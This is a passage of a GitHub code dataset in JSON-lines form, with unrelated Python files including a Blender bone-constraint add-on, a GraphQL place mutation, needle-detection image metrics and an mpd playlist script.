constraint.to_max_z_scale = float(con.to_max_z)\n elif con.type == \"COPY_LOCATION\":\n constraint.use_x = con.from_min_x == \"True\"\n constraint.invert_x = con.from_max_x == \"True\"\n constraint.use_y = con.from_min_y == \"True\"\n constraint.invert_y = con.from_max_y == \"True\"\n constraint.use_z = con.from_min_z == \"True\"\n constraint.invert_z = con.from_max_z == \"True\"\n constraint.head_tail = float(con.head_tail)\n constraint.use_offset = con.use_offset\n elif con.type == \"COPY_ROTATION\":\n constraint.use_x = con.from_min_x == \"True\"\n constraint.invert_x = con.from_max_x == \"True\"\n constraint.use_y = con.from_min_y == \"True\"\n constraint.invert_y = con.from_max_y == \"True\"\n constraint.use_z = con.from_min_z == \"True\"\n constraint.invert_z = con.from_max_z == \"True\"\n constraint.use_offset = con.use_offset\n\n if con.type == \"TRANSFORM\" or con.type == \"COPY_LOCATION\" or \\\n con.type == \"COPY_ROTATION\":\n constraint.target_space = con.target_space\n constraint.owner_space = con.owner_space\n\n constraint.influence = con.influence\n\n if con.type == \"IK\":\n if con.pole_target != \"\":\n constraint.pole_target = bpy.data.objects[target]\n if con.pole_subtarget != \"\":\n constraint.pole_subtarget = con.pole_subtarget\n constraint.pole_angle = con.pole_angle\n constraint.iterations = con.iterations\n constraint.chain_count = con.chain_count\n constraint.use_tail = con.use_tail\n constraint.use_stretch = con.use_stretch\n constraint.use_location = con.use_location\n constraint.weight = con.weight\n constraint.use_rotation = con.use_rotation\n constraint.orient_weight = con.orient_weight\n\n return {'FINISHED'}\n\n\nclass XMillerTransformations(bpy.types.Operator):\n\n bl_idname = \"object.x_miller_transformations\"\n bl_label = \"XMillerTransformations\"\n bl_description = \"X-Axis Miller Bone Transformation constraings.\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n\n props = context.window_manager.sync_bone_constraints_props\n\n props.msg_x_miller_chk = bpy.app.translations.pgettext(\"Start.\")\n\n if props.direction == \"l2r\":\n key = r\"\\.L($|\\.|_)\"\n other_side = \"R\"\n else:\n key = r\"\\.R($|\\.|_)\"\n other_side = \"L\"\n\n for x in bpy.context.selected_pose_bones:\n\n # SKIP Other side & Center bones\n if re.search(key, x.name) is None:\n continue\n\n print(re.search(key, x.name) == False)\n\n if len(x.constraints) == 0:\n continue\n\n for y in x.constraints:\n if y.type == \"TRANSFORM\":\n print(x.name + \", \" + y.name)\n\n # search other side bone & constraint\n other_side_bone_name =\\\n common.get_otherside_name(key, other_side, x.name)\n\n if re.search(key, y.subtarget) is None:\n continue\n\n other_side_tgt_name =\\\n common.get_otherside_name(key, other_side, y.subtarget)\n\n x2 = x.id_data.pose.bones[other_side_bone_name]\n y2 = x2.constraints[y.name]\n\n\n # data.bone_name = x.name\n # data.constraint_name = y.name\n y2.mute = y.mute\n # y2.target = y.target.name\n y2.subtarget = other_side_tgt_name\n y2.use_motion_extrapolate = y.use_motion_extrapolate\n y2.from_min_x = y.from_min_x\n y2.from_max_x = y.from_max_x\n y2.from_min_y = y.from_min_y\n y2.from_max_y = y.from_max_y\n y2.from_min_z = y.from_min_z\n y2.from_max_z = y.from_max_z\n y2.map_to_x_from = y.map_to_x_from\n y2.map_to_y_from = y.map_to_y_from\n y2.map_to_z_from = y.map_to_z_from\n y2.map_to = y.map_to\n\n if y.map_to == \"LOCATION\":\n y2.to_min_x = y.to_min_x\n y2.to_max_x = y.to_max_x\n y2.to_min_y = y.to_min_y\n y2.to_max_y = y.to_max_y\n y2.to_min_z = y.to_min_z\n y2.to_max_z = y.to_max_z\n elif y.map_to == \"ROTATION\":\n y2.to_min_x_rot = y.to_min_x_rot\n y2.to_max_x_rot = y.to_max_x_rot\n y2.to_min_y_rot = y.to_min_y_rot\n y2.to_max_y_rot = y.to_max_y_rot\n y2.to_min_z_rot = y.to_min_z_rot\n y2.to_max_z_rot = y.to_max_z_rot\n else:\n # map_to:SCALE\n y2.to_min_x_scale = y.to_min_x_scale\n y2.to_max_x_scale = y.to_max_x_scale\n y2.to_max_y_scale = y.to_max_y_scale\n y2.to_min_y_scale = y.to_min_y_scale\n y2.to_min_z_scale = y.to_min_z_scale\n y2.to_max_z_scale = y.to_max_z_scale\n\n y2.target_space = y.target_space\n y2.owner_space = y.owner_space\n y2.influence = y.influence\n # y2.type = y.type\n\n props.msg_x_miller_chk = bpy.app.translations.pgettext(\"Finished.\")\n\n return {'FINISHED'}\n\n\n\n# Add \"Auto Breakdown\" tab on Tool Shelf\nclass VIEW3D_PT_AutoBreakdown(bpy.types.Panel):\n\n bl_label = bpy.app.translations.pgettext(\"Sync Bone Constraints\")\n # String on TAB\n bl_space_type = 'VIEW_3D' # Area which show menu\n bl_region_type = 'TOOLS' # Region which show menu\n bl_category = bpy.app.translations.pgettext(\"Auto Breakdown\")\n # String displayed in the header of the menu that opened the tab\n bl_context = \"posemode\" # Context which show panel\n\n # 本クラスの処理が実行可能かを判定する\n @classmethod\n def poll(cls, context):\n # オブジェクトが選択されている時のみメニューを表示させる\n for o in bpy.data.objects:\n if o.select:\n return True\n return False\n\n # ヘッダーのカスタマイズ\n def draw_header(self, context):\n layout = self.layout\n layout.label(text=\"\", icon='PLUGIN')\n\n # メニューの描画処理\n def draw(self, context):\n layout = self.layout\n scene = context.scene\n props = context.window_manager.sync_bone_constraints_props\n\n\n # ファイルブラウザを表示する\n layout.label(text = props.csv_file_directory)\n layout.label(text = props.csv_file_name)\n layout.operator(SelectCSVFile.bl_idname)\n\n# # CharacterName\n# layout.label(text = bpy.app.translations.pgettext(\"Character Name:\"))\n# layout.label(text = bpy.path.abspath(\"//\"))\n\n# # display the properties\n# layout.prop(props, \"emotion\", \\\n# text=bpy.app.translations.pgettext(\"Emotion\"))\n\n# layout.separator()\n\n# layout.prop(props, \"overwrite_data\", \\\n# text=bpy.app.translations.pgettext(\"Overwrite Data\"))\n\n\n# layout.prop_search(props, \"sel_obj\", context.scene, \\\n# \"objects\", text=\"Objects\")\n# row = layout.row()\n# row.prop_search(props, \"sel_obj\", context.scene, \"objects\", text=\"Objects\")\n# row = layout.row()\n# row.prop(props, \"sel_obj\")\n\n row = layout.row()\n\n props.init_val_list()\n\n row.prop_search(props, \"sel_armature\", props,\n \"string_val_list\",\n text = bpy.app.translations.pgettext(\"Target\"),\n icon=\"OUTLINER_OB_ARMATURE\")\n\n# row = layout.row()\n# row.prop(props, \"sel_armature\")\n\n # props.update_val(props.sel_armature)\n# row.prop(props, \"sel_string_val\")\n\n layout.separator()\n\n row = layout.row()\n box = row.box()\n box_row = box.row()\n\n props.check()\n\n box_row.label(text = props.msg_chk, icon=props.msg_icon)\n\n layout.operator(SyncBoneConstraints.bl_idname, \\\n text = bpy.app.translations.pgettext(\"Sync\"))\n\n# layout.separator()\n\n# layout.operator(ExportBoneConstraints.bl_idname, \\\n# text = bpy.app.translations.pgettext(\"Write CSV\"))\n\n# layout.separator()\n\n# layout.operator(ImportBoneConstraints.bl_idname, \\\n# text = bpy.app.translations.pgettext(\"Read CSV\"))\n\n# layout.separator()\n\n# layout.operator(SyncBonesIK.bl_idname, \\\n\n\n# Add X-Miller Function Panel\nclass VIEW3D_PT_XMiller(bpy.types.Panel):\n\n bl_label = bpy.app.translations.pgettext(\"X-Miller Bone Transformations\")\n # String on TAB\n bl_space_type = 'VIEW_3D' # Area which show menu\n bl_region_type = 'TOOLS' # Region which show menu\n bl_category = bpy.app.translations.pgettext(\"Auto Breakdown\")\n # String displayed in the header of the menu that opened the tab\n bl_context = \"posemode\" # Context which show panel\n\n # 本クラスの処理が実行可能かを判定する\n @classmethod\n def poll(cls, context):\n # オブジェクトが選択されている時のみメニューを表示させる\n for o in bpy.data.objects:\n if o.select:\n return True\n return False\n\n # ヘッダーのカスタマイズ\n def draw_header(self, context):\n layout = self.layout\n layout.label(text=\"\", icon='PLUGIN')\n\n # メニューの描画処理\n def draw(self, context):\n layout = self.layout\n scene = context.scene\n props = context.window_manager.sync_bone_constraints_props\n\n\n layout.prop(props, \"direction\", \\\n text=bpy.app.translations.pgettext(\"direction\"))\n\n layout.separator()\n\n row = layout.row()\n box = row.box()\n box_row = box.row()\n\n # props.check_x_miller()\n\n box_row.label(text = props.msg_x_miller_chk, icon=\"NONE\")\n\n layout.operator(XMillerTransformations.bl_idname, \\\n text = bpy.app.translations.pgettext(\"Copy\"))\n\n# text = bpy.app.translations.pgettext(\"Sync IK\"))\n","repo_name":"natukikazemizo/Sedna1.0","sub_path":"src/python/addons/animation_auto_breakdown/sync_bone_constraints.py","file_name":"sync_bone_constraints.py","file_ext":"py","file_size_in_byte":27340,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"} +{"seq_id":"12143731526","text":"from contextvars import ContextVar\nfrom typing import Type, TypeVar\n\nfrom gino import Gino\n\n\n__all__ = \"ContextGino\",\n\nT = TypeVar(\"T\")\n\n\nclass ContextGino(Gino):\n \"\"\"\n For context bind, and pool.\n usage is simple\n just ContextGino.get_current() but only in functions, and something lke this\n and you should ready for atack of gino engine instance\n but take care about global \"GINO\"'s\n like that globals may raise huge problems\n \"\"\"\n # unfortunetly, variant of\n # using with ContextInstanceMixin from aiogram\n # not working\n __context_instance = ContextVar(\"context_gino\")\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.set_current(ContextGino)\n\n @classmethod\n def get_current(cls: Type[T], no_error: bool = True) -> T:\n try:\n ctx = cls.__context_instance.get()\n except LookupError:\n if no_error:\n return\n raise\n else:\n return ctx\n\n @classmethod\n def set_current(cls: Type[T], value: T) -> None:\n assert not isinstance(value, cls), \\\n f'Value should be instance of {cls.__name__!r} not {type(value).__name__!r}'\n cls.__context_instance.set(value)\n","repo_name":"pikoUsername/authboi","sub_path":"iternal/store/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16946761587","text":"import contextlib\n\nimport click\nimport sty\n\nimport xthematic.colors\nimport xthematic.themes\nfrom xthematic.term import TERMINAL_COLORS\n\n\nclass ColoredContext:\n all_color_identifiers = set(xthematic.colors.ColorIdentifier.all_four_bit_colors())\n\n def __init__(self):\n self.used_color_ids = set()\n self.overwritten_colors = {}\n\n @property\n def registered_ids(self):\n return set(self.overwritten_colors.keys())\n\n @property\n def free(self):\n return self.all_color_identifiers - self.registered_ids - self.used_color_ids\n\n def register_color(self, color):\n if len(self.free) < 0:\n raise RuntimeError(\"cannot register any more color values.\")\n elif color in xthematic.term.TERMINAL_COLORS.values():\n raise ValueError(f\"color {color} is already defined in the terminal's colors\")\n\n id_ = self.free.pop()\n self.overwritten_colors[id_] = xthematic.term.TERMINAL_COLORS[id_]\n try:\n xthematic.term.TERMINAL_COLORS[id_] = color\n except Exception:\n del self.overwritten_colors[id_]\n raise\n\n def unregister_color(self, color):\n id_ = self.id_for_color(color)\n xthematic.term.TERMINAL_COLORS[id_] = self.overwritten_colors[id_]\n del self.overwritten_colors[id_]\n self.used_color_ids.remove(id_)\n\n def unregister_all(self):\n for id_ in self.registered_ids:\n xthematic.term.TERMINAL_COLORS[id_] = self.overwritten_colors[id_]\n self.overwritten_colors.clear()\n self.used_color_ids.clear()\n\n def format_string_for_ids(self, fg_id=None, bg_id=None):\n s = '{}' + sty.rs.all\n if fg_id:\n s = sty.fg(fg_id.four_bit_color_name) + s\n self.used_color_ids.add(fg_id)\n if bg_id:\n s = sty.bg(bg_id.four_bit_color_name) + s\n self.used_color_ids.add(bg_id)\n return s\n\n def format_string_for_colors(self, fg_color=None, bg_color=None):\n fg_id = self.id_for_color(fg_color) if fg_color else None\n bg_id = self.id_for_color(bg_color) if bg_color else None\n return self.format_string_for_ids(fg_id=fg_id, bg_id=bg_id)\n\n @staticmethod\n def printable_colors():\n return xthematic.term.TERMINAL_COLORS.values()\n\n @staticmethod\n def id_for_color(color):\n for id_, value in xthematic.term.TERMINAL_COLORS.items():\n if value == color:\n return id_\n raise ValueError(f\"there is no registered {color}\")\n\n\nclass ColoredStream:\n def __init__(self, context):\n self.context = context\n\n @classmethod\n @contextlib.contextmanager\n def open(cls):\n cc = ColoredContext()\n yield cls(context=cc)\n cc.unregister_all()\n\n def echo_by_id(self, text, nl=True, fg_id=None, bg_id=None):\n s = self.context.format_string_for_ids(fg_id=fg_id, bg_id=bg_id)\n click.echo(s.format(text), nl=nl)\n\n def echo(self, text, nl=True, fg=None, bg=None):\n if fg and fg not in self.context.printable_colors():\n self.context.register_color(fg)\n if bg and bg not in self.context.printable_colors():\n self.context.register_color(bg)\n s = self.context.format_string_for_colors(fg_color=fg, bg_color=bg)\n click.echo(s.format(text), nl=nl)\n\n\ndef escape_sequence_index_string(fg_id, bg_id):\n fg_bright = int(fg_id.id in range(8, 16))\n return f'{fg_bright};{30+(fg_id.id % 8)};{40+(bg_id.id % 8)}'\n\n\ndef echo_theme(theme_name=None):\n with ColoredStream.open() as stream:\n for row_id in xthematic.colors.ColorIdentifier.all_four_bit_colors():\n for col_id in list(xthematic.colors.ColorIdentifier.all_four_bit_colors())[:8]:\n stream.echo_by_id(text=escape_sequence_index_string(fg_id=row_id, bg_id=col_id),\n nl=False, fg_id=row_id, bg_id=col_id)\n click.echo(' ', nl=False)\n click.echo(nl=True)\n input()\n\n\n","repo_name":"taesko/xthematic","sub_path":"src/xthematic/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"23000275621","text":"# https://leetcode.com/problems/two-sum/\n\nclass Solution:\n \n def twoSum(self, nums: List[int], target: int) -> List[int]:\n \n dic = {}\n \n for i, num in enumerate(nums):\n dic[num] = i\n \n for i, num in enumerate(nums):\n \n pair = target - num\n \n if pair in dic and dic[pair] != i:\n return [i, dic[pair]]\n","repo_name":"soldambi/code-practice","sub_path":"LeetCode/two-sum.py","file_name":"two-sum.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"27509528006","text":"import csv\nfrom datetime import datetime,date,time,timedelta\n\ntime_format_str = '%H:%M:%S'\ndate_format_str = '%Y-%m-%d'\nnow_format_str = '%Y-%m-%d %H:%M:%S'\nname1 = 'Abigail Peterson'\nname2 = 'Anita Oliver'\ncode_str1 = '041405513376'\ncode_str2 = '041078536769'\n\ndef time_now():\n\tnow = datetime.now().strftime(time_format_str)\n\tnow = str(now)\n\treturn now\n\t\ndef date_now():\n\ttoday = datetime.now().strftime(date_format_str)\n\ttoday = str(today)\n\treturn today\n\t\ndef main():\t\n\twith open('./attendances/'+date_now()+'.csv',mode='r') as csvfile:\n\t\tcsvreader = csv.reader(csvfile)\n\t\tindex = -1\n\t\tall_line_rev = list(reversed(list(csvreader)))\n\t\tfor row in all_line_rev:\n\t\t\tindex += 1\n\t\t\tif row[1] == code_str1:\n\t\t\t\tbreak\n\t\t\n\t\tall_line_rev[index][3] = 'MLEBU'\n\t\tall_line = list(reversed(all_line_rev))\n\t\t\n\twith open('./attendances/'+date_now()+'.csv',mode='w') as csvfile:\n\t\tpresence_write = csv.writer(csvfile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\t\tfor rows in all_line:\n\t\t\tpresence_write.writerow(rows)\n\nif __name__ == \"__main__\":\n\ttry:\n\t\tmain()\n\texcept KeyboardInterrupt:\n\t\tpass\n\t\t\n# with open('./attendances/'+date_input+'.csv',mode='a') as writing:\n\t\t# presence_write = csv.writer(writing, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\t\t# presence_write.writerow([time_input,id,employee_full,status])\n\t\t\n\t\t\n\t\t\n\t\t\n","repo_name":"bimanjayaaji/rfid-attendance--odoo","sub_path":"_archieved/csv_form.py","file_name":"csv_form.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28192142342","text":"import datetime\n\nimport graphene\nimport sqlalchemy as sa\nfrom graphene import ObjectType\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom models.db_models import (\n Place,\n SecretPlaceExtra,\n Category,\n ActionsEconomy,\n)\nfrom utils.api_auth import AuthChecker\nfrom utils.config import settings as s\nfrom utils.smp_exceptions import Exc, ExceptionGroupEnum, ExceptionReasonEnum\nfrom ..gql_id import decode_gql_id\nfrom ..gql_types.place_type import PlaceType\nfrom ..service_types.coin_change_object import CoinChange\n\n\nclass PlaceAddition(ObjectType):\n added_place = graphene.Field(type_=PlaceType)\n coin_change = graphene.Field(type_=CoinChange)\n\n\nclass PlaceDataInput(graphene.InputObjectType):\n name = graphene.String(required=True)\n category_id = graphene.String(required=True)\n coordinate_longitude = graphene.Float(required=True)\n coordinate_latitude = graphene.Float(required=True)\n\n address = graphene.String()\n description = graphene.String()\n\n\nclass SecretPlaceExtraInput(graphene.InputObjectType):\n food_suggestion = graphene.String()\n time_suggestion = graphene.String()\n company_suggestion = graphene.String()\n music_suggestion = graphene.String()\n extra_suggestion = graphene.String()\n\n\nclass MutationAddPlace(graphene.Mutation):\n class Arguments:\n place_data = PlaceDataInput()\n secret_place_extra = SecretPlaceExtraInput()\n\n coin_change = graphene.Field(type_=CoinChange)\n new_place = graphene.Field(type_=PlaceType)\n\n @classmethod\n async def mutate(\n cls, root, info, place_data: dict, secret_place_extra: dict | None = None\n ):\n session: AsyncSession = info.context.session\n user_id = await AuthChecker.check_auth_mutation(session=session, info=info)\n possible_actions = await ActionsEconomy.verify_possibility(\n session=session, user_id=user_id\n )\n new_place = await basic_mapper(Place, place_data)\n new_place[Place.owner_id] = user_id\n place_category = (\n await session.execute(\n sa.select(Category.id, Category.name).where(\n Category.id == new_place[Place.category_id]\n )\n )\n ).fetchone()\n\n is_secret_place = place_category.name == s.SECRET_PLACE_NAME\n\n if not is_secret_place and secret_place_extra is not None:\n Exc.value(\n message=\"It is not possible to enter the data of a secret place in a normal place\",\n of_group=ExceptionGroupEnum.BAD_INPUT,\n reasons=ExceptionReasonEnum.INCORRECT_VALUE,\n )\n\n existing_places = (\n await session.execute(\n sa.select(Place.id).where(\n sa.and_(\n Place.owner_id == user_id,\n Place.category_id == place_category.id,\n )\n )\n )\n ).fetchall()\n if existing_places:\n action_name = (\n \"Create new secret place\"\n if is_secret_place\n else \"Create a new place of the same category\"\n )\n else:\n action_name = (\n \"Create first secret place\" if is_secret_place else \"Create a place\"\n )\n # TODO return how much more coins is needed - Ougen\n if not possible_actions[action_name]:\n Exc.low_wallet(\n message=\"Insufficient coins\",\n of_group=ExceptionGroupEnum.BAD_BALANCE,\n reasons=ExceptionReasonEnum.LOW_BALANCE,\n )\n\n # adding a place to db\n if is_secret_place and secret_place_extra:\n new_secret_place_data = await basic_mapper(\n SecretPlaceExtra, secret_place_extra\n )\n secret_place_id = (\n await session.execute(\n sa.insert(SecretPlaceExtra)\n .values(new_secret_place_data)\n .returning(SecretPlaceExtra.id)\n )\n ).scalar()\n else:\n secret_place_id = None\n new_place[Place.secret_extra_id] = secret_place_id\n uploaded_place_id = (\n (\n await session.execute(\n sa.insert(Place).values(new_place).returning(Place.id)\n )\n )\n .fetchone()\n .id\n )\n\n # setting for all other places of the same type on fire\n time_to_decay = datetime.datetime.now() + datetime.timedelta(\n hours=s.PLACE_DECAY_DURATION_HOURS\n )\n # set some places on fire\n await session.execute(\n sa.update(Place)\n .where(\n sa.and_(\n Place.owner_id == user_id,\n Place.id != uploaded_place_id,\n Place.category_id == place_category.id,\n Place.active_due_date.is_(None),\n )\n )\n .values({Place.active_due_date: time_to_decay})\n .returning(Place.id)\n )\n\n coin_change = await ActionsEconomy.execute(\n session=session, action_name=action_name, coin_receiver_user_id=user_id\n )\n return MutationAddPlace(\n coin_change=coin_change,\n new_place=PlaceType.get_node(info, uploaded_place_id),\n )\n\n\nasync def basic_mapper(classtype, value):\n # TODO Document this piece of code - Ougen*\n # TODO remove async pollution here - Ougen*\n new_value = {}\n for attr, attr_val in value.items():\n if \"id\" in attr:\n attr_val = decode_gql_id(attr_val)[1]\n if hasattr(classtype, attr):\n new_value[getattr(classtype, attr)] = attr_val\n return new_value\n","repo_name":"MajorXaker/showmeplace-api","sub_path":"gql/mutations/add_place.py","file_name":"add_place.py","file_ext":"py","file_size_in_byte":5797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"4941342603","text":"import numpy as np\nimport cv2\n\ndef max_contour(inp_img):\n\n norm_image = cv2.normalize(inp_img, None, alpha = 0, beta = 255, norm_type = cv2.NORM_MINMAX, dtype = cv2.CV_32F)\n norm_image = norm_image.astype(np.uint8)\n\n thresholded = cv2.threshold(norm_image,25,255,cv2.THRESH_BINARY)[1]\n\n contours,_ = cv2.findContours(thresholded.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n max = [0,0,0,0]\n\n for c in contours:\n x,y,w,h = cv2.boundingRect(c)\n\n if w*h > max[2]*max[3]:\n max = [x,y,w,h]\n point1 = (max[0],max[1]+max[3])\n point2 = (max[0]+max[2],max[1])\n\n angle = np.arctan(max[3]/max[2])\n \n return point1, point2, angle\n\ndef pred_needle_img(point1, point2, size=(440, 500)):\n\n zeros = np.zeros(size)\n cv2.line(zeros, point1, point2, (255,255,255), 2)\n \n return zeros\n\ndef inline_BB(point1, point2, shape, a = 15):\n \n x1, y1 = point1\n x2, y2 = point2\n\n zeros = np.zeros(shape)\n cv2.line(zeros, (x1, y1), (x2, y2), (255,255,255), 1)\n\n tan = -1*(y1-y2)/(x1-x2)\n theta = np.arctan(tan)\n\n cos_minus_sin = np.cos(theta) - np.sin(theta)\n\n cos_plus_sin = np.cos(theta) + np.sin(theta)\n\n point1 = [x1-a*cos_minus_sin, y1 + a*cos_plus_sin]\n point2 = [x1-a*cos_plus_sin, y1 - a*cos_minus_sin]\n point3 = [x2 + a*cos_minus_sin, y2 - a*cos_plus_sin]\n point4 = [x2 + a*cos_plus_sin, y2 + a*cos_minus_sin]\n\n pts = np.array([point1, point2, \n point3, point4],\n np.int32)\n\n image = cv2.polylines(zeros, [pts], True, (255,255,255), 1)\n return image\n\ndef max_contour(img):\n norm_image = cv2.normalize(img, None, alpha = 0, beta = 255, norm_type = cv2.NORM_MINMAX, dtype = cv2.CV_32F)\n norm_image = norm_image.astype(np.uint8)\n\n thresholded = cv2.threshold(norm_image,127,255,cv2.THRESH_BINARY)[1]\n\n contours, _ = cv2.findContours(thresholded.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n output = np.zeros_like(img)\n if len(contours) != 0:\n c = max(contours, key = cv2.contourArea)\n cv2.drawContours(output, [c], -1, 255, -1)\n\n return output\n\ndef angle_acc(act_angle, pred_angle):\n return (act_angle-pred_angle)**2\n\ndef dist_acc(pred_point1, pred_point2, act_point1, act_point2, size):\n\n center = np.array(size)/2\n\n pred_point1 = np.array(pred_point1)\n pred_point2 = np.array(pred_point2)\n \n pred_dist = np.cross(pred_point2-pred_point1,center-pred_point1)/np.linalg.norm(pred_point2-pred_point1)\n\n act_point1 = np.array(act_point1)\n act_point2 = np.array(act_point2)\n \n act_dist = np.cross(act_point2-act_point1,center-act_point1)/np.linalg.norm(act_point2-act_point1)\n \n return np.square(act_dist-pred_dist)\n\ndef dice_coef(y_true, y_pred):\n\n y_true_f = y_true.flatten()\n y_pred_f = y_pred.flatten()\n intersection = np.sum(y_true_f * y_pred_f)\n smooth = 0.0001\n return (2. * intersection + smooth) / (np.sum(y_true_f) + np.sum(y_pred_f) + smooth)\n\ndef IOU(act_rect, pred_rect):\n\n intersection = np.logical_and(act_rect, pred_rect)\n union = np.logical_or(act_rect, pred_rect)\n \n iou_score = np.sum(intersection) / np.sum(union)\n \n return iou_score\n\ndef recall(act_rect, pred_rect):\n\n tp = np.sum(np.logical_and(act_rect, pred_rect))\n fn = np.sum(np.logical_and(act_rect, 1-pred_rect))\n recall = tp/(tp+fn)\n\n return recall\n\ndef precision(act_rect, pred_rect):\n\n tp = np.sum(np.logical_and(act_rect, pred_rect))\n fp = np.sum(np.logical_and(1-act_rect, pred_rect))\n precision = tp/(tp+fp)\n\n return precision\n \ndef F1(precision,recall):\n F1=2*precision*recall/(precision+recall)\n \n return F1","repo_name":"gupta-bhavesh/Curriculum_KD","sub_path":"needle/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"18524626816","text":"import os\nfrom com.common import COLOR\nimport cv2\n\nclass SaveToFrame (object):\n def __init__(self,**kwargs):\n self.frame = kwargs['frame']\n self.f_path = kwargs['path']\n self.f_name = kwargs['filename']\n #self.frame_id = kwargs['frame_id']\n #self.x, self.y = kwargs['x'], kwargs['y']\n #self.s = kwargs['s']\n\n\n\n def create_full_frame(self):\n frame = os.path.join(self.f_path, self.f_name)\n print(COLOR.RED + frame + COLOR.END)\n cv2.imwrite(frame + '.png', self.frame)\n\n\n\n\n\n","repo_name":"igorfed/Annotation_v1","sub_path":"com/common_frame_files.py","file_name":"common_frame_files.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"36126047171","text":"#!/usr/bin/env python3\n\n\"\"\"Playlist-manipulating mpc wrapper script.\n\nUsage:\n playlist [options]\n playlist [options] add \n playlist [options] add-from \n playlist [options] add-random \n playlist lyrics []\n playlist [options] pause-after-current []\n playlist repeat-current-once\n playlist -h | --help\n playlist --version\n\nOptions:\n -a, --all Add all items in the directory. Overrides `--number'.\n -h, --help Print this message and exit.\n -l, --filenames Print tracks as filenames instead of the default “artist — title format.\n -n, --number= Add this many items maximum. Set to `all' to add all items in the directory. Defaults to `all' for `add-random', and `1' for `add-from'.\n --version Print version info and exit.\n\"\"\"\n\nimport pathlib\nimport sys\n\nsys.path += ['/opt/py', str(pathlib.Path.home() / 'py')]\n\nimport contextlib\nimport os\nimport random\nimport re\nimport socket\nimport subprocess\n\nimport docopt # PyPI: docopt\nimport mpd # PyPI: python-mpd2\n\nimport syncbin\n\n__version__ = syncbin.__version__\n\nMPD_ROOT = pathlib.Path(os.environ.get('MPD_ROOT', '/Users/fenhl/Music'))\n\ndef client(host=None, port=6600, *, password=None, idle_timeout=None):\n if host is None:\n password, host = os.environ['MPD_HOST'].split('@')\n c = mpd.MPDClient()\n c.connect(host, port)\n if password is not None:\n c.password(password)\n if idle_timeout is not None:\n c.idletimeout = idle_timeout\n return c\n\ndef format_song(song, arguments={}):\n if not arguments.get('--filenames'):\n with contextlib.suppress(KeyError):\n return '{} — {}'.format(song['artist'], song['title'])\n return song['file']\n\nif __name__ == '__main__':\n arguments = docopt.docopt(__doc__, version='playlist from fenhl/syncbin ' + __version__)\n if arguments['add']:\n # add the given path to the playlist in alphabetical order\n path = pathlib.Path(arguments[''])\n if (MPD_ROOT / path).is_dir():\n track_iterator = (MPD_ROOT / path).iterdir()\n else:\n track_iterator = iter([MPD_ROOT / path])\n amount = float('inf') if arguments['--all'] or arguments['--number'] == 'all' else (float('inf') if arguments['--number'] is None else int(arguments['--number']))\n i = 0\n for f in sorted(track_iterator):\n if i >= amount:\n break\n subprocess.run(['mpc', 'add', str(f.relative_to(MPD_ROOT))], check=True)\n i += 0\n if arguments['add-from']:\n # add files from the given path's parent, starting with the given path, to the playlist in alphabetical order\n path = pathlib.Path(arguments[''])\n track_iterator = (MPD_ROOT / path).parent.iterdir()\n amount = float('inf') if arguments['--all'] or arguments['--number'] == 'all' else (float('inf') if arguments['--number'] is None else int(arguments['--number']))\n found = False\n i = 0\n for f in sorted(track_iterator):\n if f.name.startswith(path.name):\n found = True\n if found:\n if i >= amount:\n break\n subprocess.run(['mpc', 'add', str(f.relative_to(MPD_ROOT))], check=True)\n i += 1\n elif arguments['add-random']:\n tracks = subprocess.run(['mpc', 'ls', arguments['']], stdout=subprocess.PIPE, encoding='utf-8', check=True).splitlines()\n random.shuffle(tracks)\n amount = float('inf') if arguments['--all'] or arguments['--number'] == 'all' else (1 if arguments['--number'] is None else int(arguments['--number']))\n for i, track in enumerate(tracks):\n if i >= amount:\n break\n exit_status = subprocess.run(['mpc', 'add', track]).returncode\n if exit_status != 0:\n sys.exit(exit_status)\n elif arguments['lyrics']:\n sys.exit(subprocess.run(['eyeD3', arguments[''] or client().playlistid()[0]['file']]).returncode) #TODO only display lyrics, not other ID3 tags\n elif arguments['pause-after-current']:\n num_tracks = int(arguments['']) if arguments[''] else 1\n c = client(idle_timeout=1)\n for i in range(num_tracks):\n song = c.currentsong()\n print('[....] {}'.format(format_song(song, arguments)), end='\\r[....]', flush=True)\n if i == num_tracks - 1:\n c.single(1)\n try:\n while True:\n progress = min(4, int(5 * float(c.status()['elapsed']) / float(song['time'])))\n print('\\r[{}{}]'.format('=' * progress, '.' * (4 - progress)), end='', flush=True)\n try:\n c.idle('player')\n except socket.timeout:\n c = client(idle_timeout=1)\n if c.currentsong().get('id') != song['id']:\n break\n except KeyboardInterrupt:\n print('\\r[ ^C ] {}'.format(format_song(song, arguments)), flush=True)\n client().single(0)\n sys.exit(1)\n print('\\r[ ok ]', flush=True)\n c.single(0)\n elif arguments['repeat-current-once']:\n current = subprocess.run(['mpc', 'current', '--format=%file%'], stdout=subprocess.PIPE, encoding='utf-8', check=True)[:-1].decode('utf-8')\n sys.exit(subprocess.run(['mpc', 'insert', current]).returncode)\n else:\n c = client()\n for song in c.playlistid():\n if int(song['pos']) > 9999:\n print('[ ** ]', 'playlist truncated')\n break\n print('[{: >4}] 